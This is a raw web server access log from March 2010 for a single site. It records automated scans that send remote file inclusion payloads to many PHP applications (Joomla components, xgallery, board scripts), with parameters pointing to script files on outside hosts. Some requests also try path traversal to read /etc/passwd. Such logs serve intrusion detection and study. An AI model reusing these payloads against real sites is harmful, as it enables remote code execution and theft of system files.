69.64.70.246 - - [05/Mar/2010:06:10:34 -0800] "GET /////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:10:34 -0800] "GET /logs/access_100203.log//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:10:34 -0800] "GET /logs//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:10:42 -0800] "GET /logs/access_100206.log//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:10:44 -0800] "GET /logs/access_100209.log%20%20///include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:11:09 -0800] "GET /logs/access_100203.log//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:11:09 -0800] "GET /////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:11:14 -0800] "GET /logs/access_100206.log//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:12:00 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:12:00 -0800] "GET /logs/access_100201.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:12:00 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:12:02 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:12:02 -0800] "GET /logs/access_100201.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:12:02 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:12:03 -0800] "GET /logs/access_100224.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:12:06 -0800] "GET /logs/access_100226.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:12:07 -0800] "GET /logs/access_100226.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:12:52 -0800] "GET /logs/access_100224.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:13:07 -0800] "GET /logs/access_100224.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:06:13:51 -0800] "GET /logs/access_100215.log/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:06:13:51 -0800] "GET /logs/access_100219.log/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:06:13:54 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:06:13:54 -0800] "GET /logs/access_100126.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:06:13:54 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:14:18 -0800] "GET /logs/access_100217.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:14:18 -0800] "GET /logs/access_100225.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:06:14:25 -0800] "GET /logs/access_100213.log//?_zb_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:06:14:25 -0800] "GET /logs//?_zb_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:06:14:25 -0800] "GET /logs/access_100126.log%20%20//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:06:14:25 -0800] "GET /download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:06:14:25 -0800] "GET /logs//download.php?board_skin_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:06:14:26 -0800] "GET /?_zb_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:16:40 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:16:44 -0800] "GET /logs/phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:06:21:10 -0800] "GET /modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:06:21:10 -0800] "GET /logs/access_100221.log%20%20//modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:06:21:11 -0800] "GET /logs//modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:06:21:12 -0800] "GET /logs/access_100226.log%20%20//modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:05 -0800] "GET /logs/access_100219.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:05 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:05 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:06 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:06 -0800] "GET /logs/access_100219.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:08 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:08 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:22:08 -0800] "GET /logs/access_100219.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:22:25 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:22:33 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:22:50 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:23:58 -0800] "GET /logs/access_100126.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:24:06 -0800] "GET /logs/access_100126.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:24:08 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:24:08 -0800] "GET /logs/access_100210.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:24:08 -0800] "GET /logs/access_100205.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:24:08 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:24:11 -0800] "GET /logs/access_100126.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:25:54 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:25:54 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:25:54 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:06:26:05 -0800] "GET //modules/Forums/admin/admin_styles.php?=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:06:26:05 -0800] "GET /logs/access_100201.log///modules/Forums/admin/admin_styles.php?=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:06:26:05 -0800] "GET /logs///modules/Forums/admin/admin_styles.php?=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:26:14 -0800] "GET /logs/access_100218.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:26:22 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:26:22 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:26:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:26:42 -0800] "GET /logs/access_100218.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:06:26:53 -0800] "GET /logs/access_100211.log///modules/Forums/admin/admin_styles.php?=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:28:29 -0800] "GET /logs/access_100219.log//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:28:29 -0800] "GET /download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:28:30 -0800] "GET /logs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:29:05 -0800] "GET /logs/access_100201.log//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [05/Mar/2010:06:30:43 -0800] "GET /logs/access_100219.log HTTP/1.1" 200 4434838 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:06:31:14 -0800] "GET /logs/access_100217.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:06:31:14 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:06:31:15 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://zpeppe.interfree.it/echos.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.808" "www.puaga.com"
84.38.160.77 - - [05/Mar/2010:06:32:40 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [05/Mar/2010:06:32:40 -0800] "GET /logs/access_100128.log//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [05/Mar/2010:06:32:40 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
195.190.166.35 - - [05/Mar/2010:06:33:00 -0800] "GET /logs/access_100126.log//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [05/Mar/2010:06:33:00 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [05/Mar/2010:06:33:00 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [05/Mar/2010:06:33:12 -0800] "GET /logs/access_100128.log//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:06:33:37 -0800] "GET /logs/access_100215.log//modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [05/Mar/2010:06:33:37 -0800] "GET /logs/access_100126.log//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:06:33:39 -0800] "GET /logs/access_100303.log//modifyform.html?code=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:33:45 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:33:45 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:33:45 -0800] "GET /logs/access_100225.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:34:12 -0800] "GET /logs/access_100126.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:34:17 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:34:17 -0800] "GET /logs/access_100220.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:34:18 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:34:52 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:35:06 -0800] "GET /logs/access_100225.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:35:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:35:06 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:06:35:32 -0800] "GET /logs/access_100126.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:35:32 -0800] "GET /logs/access_100205.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:35:32 -0800] "GET /logs/access_100210.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:06:38:01 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:06:38:01 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:06:38:02 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:39:02 -0800] "GET /logs/access_100217.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:39:07 -0800] "GET /logs/access_100219.log//bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:39:07 -0800] "GET /bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:39:07 -0800] "GET /logs//bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:39:08 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:39:09 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:39:35 -0800] "GET /logs/access_100214.log//bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:39:41 -0800] "GET /logs/access_100225.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:40:23 -0800] "GET /logs/access_100217.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:40:23 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:40:24 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:40:54 -0800] "GET /logs/access_100225.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
